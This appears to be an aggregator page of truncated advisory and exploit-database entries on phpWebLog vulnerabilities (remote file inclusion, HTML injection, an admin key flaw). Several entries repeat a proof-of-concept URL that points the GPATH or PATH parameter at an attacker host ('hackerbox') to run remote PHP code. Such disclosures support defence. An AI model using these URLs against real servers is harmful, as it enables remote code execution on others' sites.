EUVD-2001-0088

Malware in sbrugna...

EUVD-2005-0699

Malware in sbrugna...

Foojan PHPWeblog Html Injection Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/14658/info Foojan PHPWeblog is prone to an HTML injection vulnerability. This is due to a lack of proper sanitization of user-supplied input. Attacker-supplied HTML and script code would be executed in the context of the...

phpWebLog <= 0.5.3 Arbitrary File Inclusion

No description provided by source. Example: if registerglobals=on and allowurlfopen=on: http://victim/dir/include/init.inc.php?GPATH=http://hackerbox/ http://victim/dir/backend/addons/links/index.php?PATH=http://hackerbox/ milw0rm.com 2005-03-07...

Jason Hines PHPWebLog 0.4/0.5 - Remote File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/12747/info phpWebLog is prone to remote file include vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input prior to using it in a PHP 'includeonce' function call. An...

phpWebLog <= 0.5.3 Multiple Vulnerabilities - Active Check

phpWebLog is prone to several flaws, including possibly arbitrary code execution. SPDX-FileCopyrightText: 2005 Noam Rathaus Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

[UNIX] Multiple Vulnerabilities in phpWebLog &#40;Cross Site Scripting, File Inclusion&#41;

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source...

phpweblog053.txt

-- == -- == -- == -- == -- == -- == -- == -- == -- == -- Name: phpWebLog Version: ,,,,,,,,"; Are we developing? $GDEBUG = false; Number of seconds to hold cache $GCACHE = 10; phpWebLog version $GVER = "0.5.3"; ... /== include libraries/functions =========================================/...

CVE-2005-0698

PHPWebLog

CVE-2005-0698

PHP remote file inclusion vulnerability in PHPWebLog 0.5.3 and earlier allows remote attackers to execute arbitrary PHP code by modifying the 1 GPATH parameter to init.inc.php or the 2 PATH parameter to index.php to reference a URL on a remote web server that contains the code...

phpWebLog &lt;= 0.5.3 arbitrary file inclusion &#40;VXSfx&#41;

-- == -- == -- == -- == -- == -- == -- == -- == -- == -- Name: phpWebLog Version: = 0.5.3 Homepage: http://phpweblog.org/ Author: Filip Groszynski VXSfx Date: 7 March 2005 -- == -- == -- == -- == -- == -- == -- == -- == -- == -- Vulnerable code in include/init.inc.php: ... Allowed HTML tags in...

CVE-2005-0698

PHP remote file inclusion vulnerability in PHPWebLog 0.5.3 and earlier allows remote attackers to execute arbitrary PHP code by modifying the 1 GPATH parameter to init.inc.php or the 2 PATH parameter to index.php to reference a URL on a remote web server that contains the code...

phpWebLog 0.5.3 - Arbitrary File Inclusion

Example: if registerglobals=on and allowurlfopen=on: http://victim/dir/include/init.inc.php?GPATH=http://hackerbox/ http://victim/dir/backend/addons/links/index.php?PATH=http://hackerbox/ milw0rm.com 2005-03-07...

phpWebLog &lt;= 0.5.3 Arbitrary File Inclusion

No description provided by source. Example: if registerglobals=on and allowurlfopen=on: http://victim/dir/include/init.inc.php?GPATH=http://hackerbox/ http://victim/dir/backend/addons/links/index.php?PATH=http://hackerbox/ milw0rm.com 2005-03-07...

Jason Hines PHPWebLog 0.40.5 - Remote File Inclusion

Jason Hines PHPWebLog 0.40.5 - Remote File Inclusion source: https://www.securityfocus.com/bid/12747/info phpWebLog is prone to remote file include vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input prior to using it in a PHP 'includeonce'...

phpWebLog 0.5.3 - Arbitrary File Inclusion

phpWebLog 0.5.3 - Arbitrary File Inclusion Example: if registerglobals=on and allowurlfopen=on: http://victim/dir/include/init.inc.php?GPATH=http://hackerbox/ http://victim/dir/backend/addons/links/index.php?PATH=http://hackerbox/ milw0rm.com 2005-03-07...

phpWebLog <= 0.5.3 Arbitrary File Inclusion

Exploit for unknown platform in category web applications =========================================== phpWebLog = 0.5.3 Arbitrary File Inclusion =========================================== Example: if registerglobals=on and allowurlfopen=on:...

Jason Hines PHPWebLog 0.4/0.5 - Remote File Inclusion

source: https://www.securityfocus.com/bid/12747/info phpWebLog is prone to remote file include vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input prior to using it in a PHP 'includeonce' function call. An attacker may leverage this issue to...

CVE-2001-0088

common.inc.php in phpWebLog 0.4.2 does not properly initialize the $CONF array, which inadvertently sets the password to a single character, allowing remote attackers to easily guess the SiteKey and gain administrative privileges to phpWebLog...

CVE-2001-0088

common.inc.php in phpWebLog 0.4.2 does not properly initialize the $CONF array, which inadvertently sets the password to a single character, allowing remote attackers to easily guess the SiteKey and gain administrative privileges to phpWebLog...